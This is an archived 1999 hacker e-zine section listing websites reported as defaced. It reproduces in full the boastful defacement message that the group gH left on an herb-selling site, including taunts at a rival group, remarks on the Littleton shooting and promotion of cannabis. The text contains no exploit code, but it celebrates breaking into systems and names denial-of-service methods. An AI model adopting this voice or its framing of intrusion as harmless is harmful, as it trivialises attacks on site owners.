From http://hackedalert.8m.com's hacker news list

Indian hackers stike again:


The Indian Hackers are on fire yet a gain we see another site hacked by
this group of hackers. Who will be next? We can only wait and see. The
site was hacked last night(http://www.brockfair.com).

April 21st

From HNN http://www.hackernews.com/

RUMOURS section

contributed by Anonymous
Cracked
Yesterdays shootings at Littleton High School outside of
Denver has prompted a few website cracks.
http://mon.hiroins-net.ne.jp
http://sunrise.roma1.infn.it
http://icarus.umesci.maine.edu
http://orac.sunderland.ac.uk
We have also received reports that several other sites
are being targeted in the Denver area in relation to this
event.

While not related to the above this site was also
reported as cracked.
http://crevierbmw.com

April 22nd

contributed by Anonymous
Cracked The following sites have been reported as Cracked

http://www.kapo.ch
http://www.gr.ch
http://www.klosters.ch
http://www.progressive.ch
http://www.ci.fort-collins.co.us/
http://memex.lib.indiana.edu/
http://cddocs.fnal.gov
http://www.tang.com.au/ gH
http://www.ciudadfutura.com
http://www.perlas.com.mx
http://www.naughtytalk.com

http://www.herbonline.com/ gH

Dear Admin,
Sorry to notify you, but your system was compromised, but we aren't here to destroy your system, we are here to help. Just mv html.index index.html and itz all fixed.
Don't go off saying like the government does and say this costed you millions of dollars and shit, because it can be fixed with a single command and don't worry, this
machine isn't trojaned or anything so have fun.
View Old Index here.
{animated guy NOT pissing on the tEam spL0it logo} tEam spL0it


Have you ever had China bud?

Team Spl0it - No replys to tha post from last and i figured that from the begining. A war with you would be like taking candy from a baby or even breaking a hoe off
for her first time. Either we'll come on top right off the bat or we'll have to work to take you down, but never the less we'll win. I've seen post from team spl0it along
time ago and i used to follow a few of their sloppy hackers and just figured they would die out after the imapd days were over, but i seem to have been wrong, seeing
they are still around. I would appreciate a bit of respect in a territory you have no place being. For one, you are a sloppy hacking group who dont' fix anything you have
done. Exploiting boxes after boxes for the simple fact to use them as trash to get caught on, never thinking someone could easily be folowing them around, just sitting
and watching. No respect for hackers nor crackers due to the fact, they aren't on that level. Echoing non-passwd logins to the system with root permissions, not even
attempting to hide from anything. The first thing you should be taught besides exploiting mass ammounts of networks, is how to fix how you got in. If you did this from
the begining then maybe you wouldn't be known round the globe as a shitty pathetic un-experienced group of kids. If you want to step to us in any way or atleast admit
and come out sayen you don't want a fight/war and it'll be stopped. But you are like kids who need to get a whooping atleast once to learn not to do something. This
right here is your whooping, le

  
arn from it. But on a nicer note, enjoy the page discuss how we own you and smoke a blunt or joint to get high to this bomb ass herb
site's new html. Most of you are probably high right now, tripping, but still trying to type straight. Keep toking, learn to stop choking and never stop smoking...


Denver - This is gonna be a bit long and i figured i would let you know before hand. I feel for the people and Denver and my love goes out to every parent out their
now that has to sleep another night with once less child. My full support goes out to you and the rest that was involved in this ordeal. The weird thing is that people are
stereo typing half of this issue, saying that the internet was apart of it or that this was targeted on people in particular. Why is the media so hard in trying to plant the
reason on stupid shit and try to give a bad name to something just to get the readers hyped up. Obviously, it's over now, the shooters are dead and nothing will resolve
as a defenant answer. Leave it at that and stop bringing it up every 5 minutes and having these familys which lost children this week have to see or hear constantly.
It's bad enough they have to go through something like this, but to hear about it everywhere you go and see it on everything you watch. It's pathetic how you don't think
about how the family's feel about all these stories streching the truth and shit. Call it media or call it what you want, but it's nothing but a heartless soap opra yet deals
with real life issues. Gaining and using bad happenings as ratings for them, doing big storys on shit that should be kept to the family and shit. Just is this my opinion and
most of you will probably think that my opinion doesn't count and bla bla bla. My opinions get expressed about as much as it possibly can on the place everyone goes.
The internet, people feel this is a bad thing for our kids and will root their brain. Well, you learn alot more things on the internet then you ever will in school. Half the
things in school you won't use in anything in the future, yet on the internet, you use the current knowledge of learn the upcomming knowledge to be preparred. Actually
learning stuff you will actually use in the future, stuff you will remember and grow more towards it's usage. The worst thing on the internet is actually the media
underground, snooping around and trying to make a big story out of nothing. Nothing major down here happens, you don't understand the underground scene so keep
your nose out of it. Just how i feel i suppose, but we are here to stay, so do what you wish, i can't stop you, but i can state my opinion where i can and when i want. To
wrap this up, Denver familys i support and so do millions of millions of others, we feel and share you pain.....


About this site - This is actually a china site for herbs and i noticed some nice things on this page. I might get me some chinese herbs and be happy, but this domains
hosting company is to blaim for this. Make sure you email them and tell them their security sucks and might want to be given some free months of hosting for their
mistake. Just a thought for the clients. I kinda like herb, because i makes me feel less pressured. I know some people are high right now on the internet just tripping
over nothing. It's all good and keep smoking and one day it'll be legalized someone hear you instead of overseas and up in Canada. Smoke it how you want and stay
high. I give the big middle finger to our government who has taken gods own doing which was set here to help where it's stated written in the middle. "God put herbs
on earth to help man kind."
Btw, Cypress Hill i love you for that, I say if you smoke, you have god's right which overpowers any law made by anyone. Say what you
wish, but god is correct. Hehehe, you admins fix up your shit, work on firewalling and trip wiring your systems and maybe you wouldn't have these problems. Take
care.


Nato - Ask Nastrodmous (spelling?) what this war will end in. Could this be the war he stated would begin on june/july and be the begining of the end, lasting 30 years,
killing off our own population ourselves. Just Something to think about.


BIG SHOUT OUTS TO: complex-, nikfiend, Attrition.org, www.2600.com and staff, ne0h tha hacka boi, all of gH, sinnerz, #madland, #feed-the-goats, all of efnet just for the plain fact
that efnet rules over all other nets and most of all herbs which keep us wanting to live another day. =AMEN=

BIG FUCK YOUS TO: Every war/packet group on efnet, you have no skill and half of you i have noticed don't even understand how the denial of service you use works and thinks it
effects every Ooperating System and shit, itz really amuzing to sit on a bsd box and watch myself get scanned and then hit with slice or an oob attack or scanned for netbus. Team spl0it
and all it's affiliates who are pathetic newbies of the such, antionline for trying to talk shit behind my back, crak- on efnet, just because we owned you so so badly and anyone else who
hates on another group for no reason, but jealousy. If you are gonna talk shit, have a bit of a background on the group and base your shit talking statements on facts, not asumptions...





Copyright © gH - A bit high while done.
HTML by : MostHateD of gH
ROOT by : outburstx of gH



Other unconfirmed sites, from Hacked Alert #9 April 24th


http://www.jsims.mil
http://stan.rmi.net
http://www.herbonline.com
http://www.towngreen.com
http://www.luresa.com
http://www.shastacollege.edu
http://www.gaywired.com
http://acceso2.uv.es
http://www.icao.int
http://www.infomanage.com
http://www.shasta.cc.ca.us
http://www.hpsd.com
http://www.chinatv.net
http://nutrition.uvm.edu
http://www.silkpainting.com



_________________________________________________________________________

A.0 APPENDICES
_________________________________________________________________________



A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>


Mirror sites:
~~~~~~~~~~~~
http://www.csoft.net/~hwa/ (Down, we don't know whats going on at cubesoft)
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/


International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed



Belgium.......: http://bewoner.dma.be/cum/ <a href="http://bewoner.dma.be/cum/">Go there</a>
Brasil........: http://www.psynet.net/ka0z <a href="http://www.psynet.net/ka0z/">Go there</a>
http://www.elementais.cjb.net <a href="http://www.elementais.cjb.net/">Go there</a>
Columbia......: http://www.cascabel.8m.com <a href="http://www.cascabel.8m.com/">Go there</a>
http://www.intrusos.cjb.net <a href="http://www.intrusos.cjb.net">Go there</a>
Indonesia.....: http://www.k-elektronik.org/index2.html <a href="http://www.k-elektronik.org/index2.html">Go there</a>
http://members.xoom.com/neblonica/ <a href="http://members.xoom.com/neblonica/">Go there</a>
http://hackerlink.or.id/ <a href="http://hackerlink.or.id/">Go there</a>
Netherlands...: http://security.pine.nl/ <a href="http://security.pine.nl/">Go there</a>
Russia........: http://www.tsu.ru/~eugene/ <a href="http://www.tsu.ru/~eugene/">Go there</a>
Singapore.....: http://www.icepoint.com <a href="http://www.icepoint.com">Go there</a>

Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.

@HWA


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT